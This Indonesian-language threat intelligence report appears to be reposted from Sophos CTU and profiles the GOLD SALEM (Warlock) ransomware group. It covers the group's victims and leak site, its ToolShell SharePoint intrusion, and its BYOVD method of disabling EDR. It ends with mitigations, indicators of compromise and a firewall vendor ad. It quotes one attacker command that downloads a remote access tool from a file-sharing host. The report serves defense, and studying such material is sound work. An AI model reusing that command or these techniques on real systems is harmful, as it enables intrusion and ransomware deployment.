Operasi Warlock dari GOLD SALEM Bergabung ke Lanskap Ransomware yang Padat
Kelompok baru ini menunjukkan kemampuan teknis yang matang dengan mengikuti pola operasi ransomware umum, namun juga menampilkan tanda-tanda kecerdikan tersendiri.
Pemantauan Ancaman
Peneliti dari Counter Threat Unit™ (CTU) saat ini memantau kelompok ancaman yang menamakan dirinya Warlock Group. CTU™ melacak kelompok ini dengan sebutan GOLD SALEM. Sejak Maret 2025, kelompok ini telah berhasil mengkompromikan jaringan dan menyebarkan ransomware Warlock mereka.
Microsoft menyebut kelompok ini sebagai Storm-2603 dan menilai dengan “tingkat keyakinan moderat” bahwa kelompok ini berbasis di Tiongkok. Namun, peneliti CTU menyatakan bahwa tidak ada cukup bukti untuk mendukung atribusi tersebut.
Korban dan Aktivitas Online
Hingga pertengahan September 2025, GOLD SALEM telah mempublikasikan 60 korban, menempatkannya di tingkat menengah dibanding operasi ransomware lain pada periode yang sama.
Korban GOLD SALEM berkisar dari entitas kecil komersial atau pemerintahan hingga perusahaan multinasional besar di Amerika Utara, Eropa, dan Amerika Selatan.
Seperti kebanyakan kelompok ransomware lain, GOLD SALEM menghindari menyerang organisasi di Tiongkok dan Rusia, meskipun keduanya memiliki banyak target potensial. Namun, pada 8 September 2025, kelompok ini memposting nama korban berbasis di Rusia di situs kebocoran data khusus mereka (dedicated leak site / DLS). Korban tersebut adalah perusahaan komersial yang menyediakan layanan dan peralatan rekayasa untuk industri pembangkit listrik.
Mengingat pemerintah Rusia dikenal menindak keras kelompok yang menyerang organisasi di wilayahnya, pencantuman korban asal Rusia oleh GOLD SALEM menunjukkan bahwa kelompok ini kemungkinan beroperasi dari luar yurisdiksi tersebut.
Aktivitas Forum dan Jejak Awal
GOLD SALEM tidak memiliki jejak publik hingga Juni 2025, ketika sebuah akun di forum bawah tanah RAMP yang mewakili kelompok ini memposting permintaan eksploitasi untuk aplikasi perusahaan umum (seperti Veeam, ESXi, SharePoint) dan alat untuk menonaktifkan EDR (Endpoint Detection and Response) serta produk keamanan lainnya.
Posting berikutnya meminta kerja sama dengan broker akses awal (Initial Access Brokers/IAB) untuk mendapatkan calon korban.
Belum jelas apakah kelompok ini mencari akses untuk melakukan serangan sendiri, merekrut afiliasi untuk membangun ransomware-as-a-service (RaaS) baru, atau keduanya.
Infrastruktur Kebocoran Data
GOLD SALEM mengoperasikan situs kebocoran berbasis Tor (DLS) untuk mempublikasikan nama korban dan data yang dicuri (lihat Gambar 1).
Per 16 September 2025, data dari 19 dari 60 korban (32%) telah dipublikasikan di DLS.
Selain itu, pelaku mengklaim telah menjual data dari 27 korban (45%) kepada pembeli pribadi, kemungkinan karena tebusan tidak dibayar.
Kelompok kriminal siber kadang memang menjual data curian ke pihak ketiga, namun angka yang dipublikasikan oleh GOLD SALEM kemungkinan dilebih-lebihkan atau dipalsukan. Tiga nama korban yang sebelumnya terdaftar di DLS juga telah dihapus kemudian.
Gambar 1: Situs kebocoran GOLD SALEM per 16 September 2025
Pola Aktivitas dan Waktu Publikasi
GOLD SALEM juga memposting nama korban yang sebelumnya diserang oleh operasi ransomware lain. Meskipun jarang, hal ini dapat mengindikasikan bahwa:
-
Broker akses menjual akses yang sama ke beberapa pelaku,
-
Afiliasi memposting data curian di beberapa situs, atau
-
Korban gagal menutup celah keamanan yang sama sehingga diserang berulang kali.
Sebagai contoh, perusahaan konstruksi asal AS yang dilaporkan diserang pada Juni 2025 sebelumnya juga menjadi korban Hunters International (GOLD CRESCENT) pada Oktober 2024 dan Payout Kings pada Juni 2025.
Data yang diterbitkan oleh GOLD SALEM serta metadata dari DLS mereka menunjukkan bahwa kelompok ini mulai melakukan serangan dan pemerasan sejak Maret 2025.
Sebuah posting di forum RAMP pada 10 Juni 2025 mengumumkan ransomware Warlock dan menautkan ke versi pertama DLS berbasis Tor. Situs tersebut ditutup sehari kemudian (11 Juni) dan muncul kembali pada akhir Juli 2025.
Kelompok ini cenderung mempublikasikan korban secara bertahap (batch), sehingga nama korban baru sering muncul beberapa hari hingga minggu setelah kompromi sebenarnya.
Setiap entri korban disertai dengan tanggal “countdown” — tenggat waktu pembayaran tebusan sebelum data korban dipublikasikan (lihat Gambar 2). Biasanya tenggat ini 12–14 hari setelah nama korban muncul di DLS.
Gambar 2: Tanggal batas waktu pembayaran tebusan di DLS GOLD SALEM per 16 September 2025
Insiden yang Diamati
Pada akhir Juli 2025, peneliti CTU menganalisis sebuah insiden di mana GOLD SALEM menggunakan rantai eksploit ToolShell terhadap server SharePoint untuk mendapatkan akses awal.
Eksploit ini menggabungkan beberapa kerentanan:
CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, dan CVE-2025-53771.
Eksploitasi tersebut menghasilkan pemasangan web shell ASPX yang membuat Process object untuk cmd.exe dalam konteks proses IIS (w3wp.exe), sehingga penyerang dapat mengeksekusi perintah jarak jauh dan melihat hasilnya secara langsung.
CTU mengamati perintah berikut dieksekusi melalui web shell:
curl -L -o c:\users\public\Sophos\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt
File yang diunduh adalah server WebSockets berbasis Golang yang memungkinkan akses lanjutan ke server korban tanpa perlu web shell.
Selain itu, GOLD SALEM juga menghindari deteksi EDR dengan menggunakan teknik Bring Your Own Vulnerable Driver (BYOVD) dan driver Baidu Antivirus yang rentan (diganti nama menjadi googleApiUtil64.sys) untuk menghentikan agen EDR.
Kerentanan pada driver ini (CVE-2024-51324) memungkinkan penghentian proses arbitrer.
Menurut profil Microsoft, kelompok ini juga menggunakan Mimikatz untuk menargetkan memori LSASS guna mengekstrak kredensial teks polos, serta menggunakan PsExec dan Impacket untuk pergerakan lateral, dan Group Policy Objects (GPO) untuk menyebarkan muatan ransomware Warlock.
Pada Agustus 2025, CTU juga mengamati GOLD SALEM menyalahgunakan alat DFIR open-source Velociraptor untuk membuat tunnel jaringan Visual Studio Code di lingkungan korban. Beberapa insiden ini berakhir dengan penyebaran ransomware Warlock.
Mitigasi dan Deteksi
Organisasi disarankan untuk:
-
Melakukan pemantauan permukaan serangan (attack surface monitoring) secara rutin.
-
Menerapkan kebijakan patch agresif untuk layanan yang berhadapan langsung dengan internet.
-
Melakukan pemantauan endpoint proaktif dan respons insiden cepat untuk mendeteksi eksploitasi zero-day.
Proteksi Sophos yang mendeteksi aktivitas terkait ancaman ini meliputi:
-
Troj/WebShel-F -
Troj/Warlock-B
Untuk mengurangi risiko paparan, peneliti CTU merekomendasikan agar pelanggan menggunakan kontrol keamanan yang tersedia untuk meninjau dan membatasi akses berdasarkan indikator berikut:
| Indikator | Tipe | Konteks |
|---|---|---|
| bfbeac96a385b1e5643ec0752b132506 | MD5 hash | ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell |
| de25be0afd53a1d274eec02e5303622fc8e7dbd5 | SHA1 hash | ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell |
| 996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1 | SHA256 hash | ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell |
| b3a099ecca79503a0e4a154bd85d3e6b | MD5 hash | Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM |
| 6d0cc6349a951f0b52394ad3436d1656ec5fba6a | SHA1 hash | Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM |
| a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4 | SHA256 hash | Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM |
Tabel 1: Indikator untuk ancaman GOLD SALEM
Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, PT. iLogo Infralogy Indonesia, sebagai penyedia layanan qfirewall Infrastruktur IT dan Cybersecurity terbaik di Indonesia.
Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!